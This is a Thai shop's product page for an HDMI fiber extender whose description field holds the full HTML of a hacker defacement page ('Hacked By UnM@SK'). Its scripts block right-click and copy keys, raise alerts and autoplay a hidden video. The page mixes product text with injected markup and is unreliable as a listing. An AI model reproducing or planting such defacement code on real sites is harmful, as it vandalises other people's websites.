สินค้า - งานระบบ NETWORK - Fiber Converter To HDMI - HDMI FIBER EXTENDER

รหัส: DS-000586

HDMI FIBER EXTENDER

<html>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta http-equiv="Content-Language" content="en-us">
<meta content="Hacked By UnM@SK" name="description">
<meta content="
<meta content="Hacked By UnM@SK" name="Abstract">
<meta name="HACKED BY Rosen Berg">
<script type="text/javascript">
var msg = "Hacked By UnM@SK";
msg = " " + msg;pos = 0;
function scrollTitle() {
document.title = msg.substring(pos, msg.length) + msg.substring(0, pos); pos++;
if (pos > msg.length) pos = 0
window.setTimeout("scrollTitle()",300);


function clickIE4(){
if (event.button==2){
alert(message);
return false;
}
}

function clickNS4(e){
if (document.layers||document.getElementById&&!document.all){
if (e.which==2||e.which==3){
alert(message);
return false;
}
}
}

if (document.layers){
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=clickNS4;
}
else if (document.all&&!document.getElementById){
document.onmousedown=clickIE4;
}

document.oncontextmenu=new Function("alert(message);return false")

</script><script>
/*function check(e)
{
alert(e.keyCode);
}*/
document.onkeydown = function(e) {
        if (e.ctrlKey && (e.keyCode === 67 || e.keyCode === 86 || e.keyCode === 85 || e.keyCode === 117)) {//Alt+c, Alt+v will also be disabled sadly.
            alert(' :V ');
        }
        return false;
};
</script><style type="text/css">
h1 {color: #333;font-size: 100px;margin: 1px auto;text-align:center;text-transform:uppercase; font-family:Merienda One;}
.neon {color: #FFFFFF;text-shadow: 0 0 5px #1ab4e7, 0 0 10px #1ab4e7, 0 0 30px #18a2d0, 0 0 45px #18a2d0, 0 0 60px #18a2d0;}
h2 {color: #333;font-size: 50px;margin: 1px auto;text-align:center;text-transform:uppercase; font-family:Merienda One;}
.neon {color: #FFFFFF;text-shadow: 0 0 5px #1ab4e7, 0 0 10px #1ab4e7, 0 0 30px #18a2d0, 0 0 45px #18a2d0, 0 0 60px #18a2d0;}
h3 {color: #333;font-size: 50px;margin: 1px auto;text-align:center;text-transform:uppercase; font-family:Merienda One;}
.neon {color: #FFFFFF;text-shadow: 0 0 5px #1ab4e7, 0 0 10px #1ab4e7, 0 0 30px #18a2d0, 0 0 45px #18a2d0, 0 0 60px #18a2d0;}
.matrix {color: #FFFFFF; font-family:Arial, Courier, Monotype; font-size:10pt; text-align:center; width:10px; padding:0px; margin:0px;}
.jokitz1{
    text-align : center;
    }
.jokitz2{
    text-align : center;
    font-family : Courier;
    }
</style>
<script src="http://www.schillmania.com/projects/snowstorm/snowstorm-min.js" type="text/javascript"></script>
<link href="http://fonts.googleapis.com/css?family=Lobster+Two" rel="stylesheet" type="text/css"><link href="http://fonts.googleapis.com/css?family=Berkshire+Swash" rel="stylesheet" type="text/css"><link href="http://fonts.googleapis.com/css?family=Just+Another+Hand" rel="stylesheet" type="text/css"><link href="http://fonts.googleapis.com/css?family=Merienda+One" rel="stylesheet" type="text/css"><link href="https://fonts.googleapis.com/css?family=Kaushan+Script" rel="stylesheet" type="text/css"></head>
 
<!-------------------------------------EMBED AREA-------------------------><div style="font: message-box; color: -moz-dialogtext; background: -moz-dialog none repeat scroll 0% 0%; margin: 0px; padding: 6px; border-width: 1px; border-style: solid; border-color: threedhighlight threedshadow threedshadow threedhighlight; -moz-border-top-colors: none; -moz-border-right-colors: none; -moz-border-bottom-colors: none; -moz-border-left-colors: none; border-image: none;" id="NoRedirect-NotificationBanner-50"><span style="font: message-box; font-weight: bold; color: -moz-dialogtext; background: -moz-dialog none repeat scroll 0% 0%; border: 0px none; padding: 0px; margin: 0px;"></span><a href="" style="font: message-box; text-decoration: underline; color: -moz-hyperlinktext; background: -moz-dialog none repeat scroll 0% 0%; border: 0px none; padding: 0px; margin: 0px;"></a></div><body onload="LoadFunctions()"><embed src="https://www.youtube.com/embed/o1k9enoCSPU?autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">

<!------------------------------------/END---------------------------------->

<meta name="author" content="Hacked By UnM@SK">
<meta name="description" content="UnM@SK Was Here">
<meta content="Patch Your System!" name="keywords">
<meta content="HACKED UnM@SK || UnM@SK" name="subject">
<
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"><style>


body {
  background: url(https://mannerofspeaking.files.wordpress.com/2009/05/black1.gif) no-repeat center center fixed;
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
  color: white;
 
}
.title1{
  font-family: sans-serif;
  font-size: 30px;
  color:white;
}
.text{
  font-family: Tahoma;
  font-size: 20px;
  color:grey;
}
.text:hover{
  font-family: Tahoma;
  font-size: 21px;
  color:white;
}
</style>
<style type="text/css">
h1 {
color: #0AF9F2;
font-size: 53px;
margin: 1px auto;
text-align:center;
text-transform:uppercase;
text-shadow: 0px 0px 7px grey;
}
.neon {
color: #FBFDFD;
text-shadow: 0 0 3px white, 0 0 3px , 0 0 10px , 0 0 42px , 0 0 38px ;
 text-decoration: Bold;
}
</style>

<style>
/* unvisited link */
a:link {
    text-decoration: none;
    color: red;
}

/* visited link */
a:visited {
    text-decoration: none;
    color: Orange;
}

/* mouse over link */
a:hover {
    text-decoration: none;
    color: green;
}

/* selected link */
a:active {
    text-decoration: none;
    color: blue;
}
</style>

<center><font face="Merienda One"><strong><b><font font="" size="15" color="#56F307">THIS</font> <font font="" size="15" color="#56F307">WEB</font> <font font="" size="15" color="#56F307">SITE HAS BEEN </font></b></strong></font></center><font face="Merienda One"><b>
<center><h1><font color="RED">Hacked By UnM@SK</font></h1><p></p></center><font color="RED">
<center><h2><font font="" color="#56F307" face="Merienda One">Zuahahhaha~!</font></h2></center><p></p>

<center><img src="https://thumbs.gfycat.com/CompassionatePoshCrossbill-size_restricted.gif" width="800" height="400"></center>
<center>
<div class="title1"><strong><font font="" size="5" color="REd" face="Kaushan Script">Hacked By UnM@SK</font></strong></div>
<div class="text"><font font="" size="5" color="LIME" face="Kaushan Script">This website is very easy</font></div>
<div class="text"><font font="" size="5" color="RED" face="Kaushan Script">IndonesianHackerRulez</font></div>
 <script>
window.onload = function() {
var h1 = document.getElementsByTagName("h1")[0],
text = h1.innerText || h1.textContent,
split = [], i, lit = 0, timer = null;
for(i = 0; i < text.length; ++i) {
split.push("<span>" + text[i] + "</span>");
}
h1.innerHTML = split.join("");
split = h1.childNodes;

var flicker = function() {
lit += 0.02;
if(lit >= 1) {
clearInterval(timer);
}
for(i = 0; i < split.length; ++i) {
if(Math.random() < lit) {
split[i].className = "neon";
} else {
split[i].className = "";
}
}
}
setInterval(flicker, 130);
}
</script>
<!---------------------------------------Mouse Cursor Script Starts Here-------------------------------->
<style>
body{cursor: url("http://cur.cursors-4u.net/others/oth-1/oth84.cur"), auto;
}
</style>
<!---------------------------------------Mouse Cursor Script Ends Here---------------------------------->
<!---------------------------------------BodyOnLoad Alert Starts Here:---------------------------------->

<script language="JavaScript">
<!--
function java(){
alert("HACKED BY UnM@SK-");
}
function LoadFunctions(){
java();
}
-->
</script>

<!----------------------------------------BodyOnLoad Alert Ends Here------------------------------------->
                                    
                                    
<br><br>
 <center>
 <div id="greets">
   <span class="blueglow">
<font font="" size="8" color="RED" face="Kaushan Script">|Gretz|</font>
<br><br>

<marquee align="center" scrollamount="5" width="800"><font size="5" color="LIME" face="Merienda One">Mr.L3gacy &lt; Naskleng45 &lt; FirmanCyb#erLoly_ &lt; Desktop77N3T &lt; ./ZET404 &lt; AR404</font></marquee>
 
</span></div></center>
<center><a href="https://www.facebook.com/ahmad.sendy.5494"><font color="#FF9933">Contact Me</font></a></center><font color="#FF9933"> </font>
<center> <font color="#FFFFFF">Yeah Im Now</font></center>

<center><font color="#138808">PatchNow!<br></font>
<font size="3" color="red">IndonesianHackerRulez©</font>
<!-----------------------------------FuckOff!----------------------------></font></center></center></font></b></font></body></html>

ราคา 9,700 บาท
ราคาพิเศษ 9,630 บาท

โทรฯติดต่อสอบถามเบอร์ 090-9085860


ติดต่อใยตาวิศวกรรม

First name

Last name

Phone

Email

Subject

Question/ Details

การประกวด